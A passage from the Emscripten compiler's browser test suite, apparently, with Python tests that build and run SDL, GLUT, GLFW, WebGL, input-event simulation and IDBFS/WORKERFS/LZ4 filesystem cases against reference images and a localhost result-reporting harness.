self.btest('sdl_stb_image.c', reference='sdl-stb-bpp4.png', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_data(self):
# load an image file, get pixel data.
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_data.c', reference='screenshot.jpg', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL'])
def test_sdl_stb_image_cleanup(self):
shutil.copyfile(path_from_root('tests', 'screenshot.jpg'), 'screenshot.not')
self.btest('sdl_stb_image_cleanup.c', expected='0', args=['-s', 'STB_IMAGE=1', '--preload-file', 'screenshot.not', '-lSDL', '-lGL', '--memoryprofiler'])
def test_sdl_canvas(self):
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-lSDL', '-lGL'])
# some extra coverage
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O0', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
self.clear()
self.btest('sdl_canvas.c', expected='1', args=['-s', 'LEGACY_GL_EMULATION=1', '-O2', '-s', 'SAFE_HEAP=1', '-lSDL', '-lGL'])
def post_manual_reftest(self, reference=None):
self.reftest(path_from_root('tests', self.reference if reference is None else reference))
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function assert(x, y) { if (!x) throw 'assertion failed ' + y }
%s
var windowClose = window.close;
window.close = function() {
// wait for rafs to arrive and the screen to update before reftesting
setTimeout(function() {
doReftest();
setTimeout(windowClose, 5000);
}, 1000);
};
</script>
</body>''' % open('reftest.js').read())
create_test_file('test.html', html)
def test_sdl_canvas_proxy(self):
create_test_file('data.txt', 'datum')
self.btest('sdl_canvas_proxy.c', reference='sdl_canvas_proxy.png', args=['--proxy-to-worker', '--preload-file', 'data.txt', '-lSDL', '-lGL'], manual_reference=True, post_build=self.post_manual_reftest)
@requires_graphics_hardware
def test_glgears_proxy(self):
# we modify the asm.js, this is a non-wasm test
self.btest('hello_world_gles_proxy.c', reference='gears.png', args=['--proxy-to-worker', '-s', 'GL_TESTING=1', '-DSTATIC_GEARS=1', '-lGL', '-lglut', '-s', 'WASM=0'], manual_reference=True, post_build=self.post_manual_reftest)
# test the noProxy option applied at runtime
# run normally (duplicates the above test, but verifies we can run outside of the btest harness)
self.run_browser('test.html', None, ['/report_result?0'])
# run with noProxy
self.run_browser('test.html?noProxy', None, ['/report_result?0'])
def copy(to, js_mod, html_mod=lambda x: x):
create_test_file(to + '.html', html_mod(open('test.html').read().replace('test.js', to + '.js')))
create_test_file(to + '.js', js_mod(open('test.js').read()))
# run with noProxy, but make main thread fail
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('two.html?noProxy', None, ['/report_result?999'])
copy('two', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WEB) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('two.html', None, ['/report_result?0']) # this is still cool
# run without noProxy, so proxy, but make worker fail
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original),
lambda original: original.replace('function doReftest() {', 'function doReftest() { return; ')) # don't reftest on main thread, it would race
self.run_browser('three.html', None, ['/report_result?999'])
copy('three', lambda original: re.sub(r'function _main\(\$(.+),\$(.+)\) {', r'function _main($\1,$\2) { if (ENVIRONMENT_IS_WORKER) { var xhr = new XMLHttpRequest(); xhr.open("GET", "http://localhost:%s/report_result?999");xhr.send(); return; }' % self.port, original))
self.run_browser('three.html?noProxy', None, ['/report_result?0']) # this is still cool
@requires_graphics_hardware
def test_glgears_proxy_jstarget(self):
# test .js target with --proxy-to-worker; emits 2 js files, client and worker
self.compile_btest([path_from_root('tests', 'hello_world_gles_proxy.c'), '-o', 'test.js', '--proxy-to-worker', '-s', 'GL_TESTING=1', '-lGL', '-lglut'])
shell_with_script('shell_minimal.html', 'test.html', '<script src="test.js"></script>')
self.post_manual_reftest('gears.png')
self.run_browser('test.html', None, '/report_result?0')
def test_sdl_canvas_alpha(self):
# N.B. On Linux with Intel integrated graphics cards, this test needs Firefox 49 or newer.
# See https://github.com/emscripten-core/emscripten/issues/4069.
create_test_file('flag_0.js', '''
Module['arguments'] = ['-0'];
''')
self.btest('sdl_canvas_alpha.c', args=['-lSDL', '-lGL'], reference='sdl_canvas_alpha.png', reference_slack=12)
self.btest('sdl_canvas_alpha.c', args=['--pre-js', 'flag_0.js', '-lSDL', '-lGL'], reference='sdl_canvas_alpha_flag_0.png', reference_slack=12)
def get_async_args(self):
if self.is_wasm_backend():
return ['-s', 'ASYNCIFY']
else:
return ['-s', 'EMTERPRETIFY=1', '-s', 'EMTERPRETIFY_ASYNC=1']
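# A note on get_async_args(): the wasm backend implements async pauses via Asyncify,
# while fastcomp uses the Emterpreter (EMTERPRETIFY / EMTERPRETIFY_ASYNC). Callers
# simply append the returned flags, e.g.
#   args = ['--pre-js', 'pre.js'] + self.get_async_args()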
def test_sdl_key(self):
for delay in [0, 1]:
for defines in [
[],
['-DTEST_EMSCRIPTEN_SDL_SETEVENTHANDLER']
]:
for async_ in [
[],
['-DTEST_SLEEP', '-s', 'ASSERTIONS=1', '-s', 'SAFE_HEAP=1'] + self.get_async_args()
]:
print(delay, defines, async_)
create_test_file('pre.js', '''
function keydown(c) {
%s
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
create_test_file('sdl_key.c', self.with_report_result(open(path_from_root('tests', 'sdl_key.c')).read()))
self.compile_btest(['sdl_key.c', '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_test_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_test_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', '''EXPORTED_FUNCTIONS=['_main']'''], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_test_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
create_test_file('sdl_text.c', self.with_report_result(open(path_from_root('tests', 'sdl_text.c')).read()))
self.compile_btest(['sdl_text.c', '-o', 'page.html', '--pre-js', 'pre.js', '-s', '''EXPORTED_FUNCTIONS=['_main', '_one']''', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
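# Argument order for the (deprecated) initMouseEvent calls above, as I understand the
# DOM API: (type, canBubble, cancelable, view, detail, screenX, screenY, clientX,
# clientY, ctrlKey, altKey, shiftKey, metaKey, button, relatedTarget). The test adds
# the canvas offsets so that (x, y) are expressed in canvas-local coordinates.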
create_test_file('sdl_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
self.compile_btest(['sdl_mouse.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_test_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_test_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
create_test_file('sdl_mouse.c', self.with_report_result(open(path_from_root('tests', 'sdl_mouse.c')).read()))
self.compile_btest(['sdl_mouse.c', '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify', '0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('sdl_joystick.c', self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
self.compile_btest(['sdl_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('sdl_joystick.c', self.with_report_result(open(path_from_root('tests', 'sdl_joystick.c')).read()))
self.compile_btest(['sdl_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_test_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
create_test_file('test_glfw_joystick.c', self.with_report_result(open(path_from_root('tests', 'test_glfw_joystick.c')).read()))
self.compile_btest(['test_glfw_joystick.c', '-O2', '--minify', '0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# JavaScript code to check support in the WebGL implementation for the context attributes we want to test
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will also succeed when an attribute is not supported.
create_test_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
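# How the --js-library hook above is consumed (a sketch of the usual pattern; the exact
# declarations live in the test sources): functions registered with
# mergeInto(LibraryManager.library, {...}) become linkable symbols, so the C side can
# declare e.g.
#   extern int webglAntialiasSupported(void);
# and call it directly.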
# Copy common code file to temporary directory
filepath = path_from_root('tests/test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes deactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest('webgl_error.cpp', '0')
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT=1', '--shell-file', path_from_root('tests/preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS=1'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure', '1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest('write_file.cpp', '0', args=['-s', 'ENVIRONMENT=web', '-Os', '--closure', '1'])
@unittest.skip('Skipping due to https://github.com/emscripten-core/emscripten/issues/2770')
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['--shell-file', path_from_root('tests', 'test_fflush.html')])
def test_file_db(self):
secret = str(time.time())
create_test_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM=1'])
shutil.copyfile('test.html', 'second.html')
create_test_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']'''] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME=1', '-DFORCE_EXIT'])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_sync.c'), '1', force_c=True, args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_test', '_success']''', '-s', 'EXIT_RUNTIME=1', '-DFORCE_EXIT'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_test_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
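# FS.syncfs(populate, callback): with populate=true (as above) data is pulled from the
# persistent IDBFS store into the in-memory FS; with populate=false it would be pushed
# back out. addRunDependency/removeRunDependency keep startup blocked until the
# initial sync completes, so main() sees the persisted state.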
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME=1'] + self.get_async_args()
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
self.btest(path_from_root('tests', 'fs', 'test_idbfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main', '_success']'''])
def test_fs_memfs_fsync(self):
args = self.get_async_args() + ['-s', 'EXIT_RUNTIME=1']
secret = str(time.time())
self.btest(path_from_root('tests', 'fs', 'test_memfs_fsync.c'), '1', force_c=True, args=args + ['-DSECRET=\"' + secret + '\"', '-s', '''EXPORTED_FUNCTIONS=['_main']'''])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_test_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(path_from_root('tests', 'fs', 'test_workerfs_read.c'), '1', force_c=True, args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker'])
def test_fs_workerfs_package(self):
create_test_file('file1.txt', 'first')
if not os.path.exists('sub'):
os.makedirs('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
run_process([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker'])
def test_fs_lz4fs_package(self):
# generate data
self.clear()
os.mkdir('subdir')
create_test_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
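# Quick arithmetic behind the asserts above: each of the three files is
# 1024 * 128 * 10 = 1,310,720 bytes (plus one extra byte in file3.txt), so the raw
# total is 3,932,161 bytes; the packaged test.data must come in under half of
# 3,932,160 bytes for the LZ4 compression check to pass.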
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'])
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([PYTHON, FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2'])
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM=1', '-O2', '--closure', '1', '-g1'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
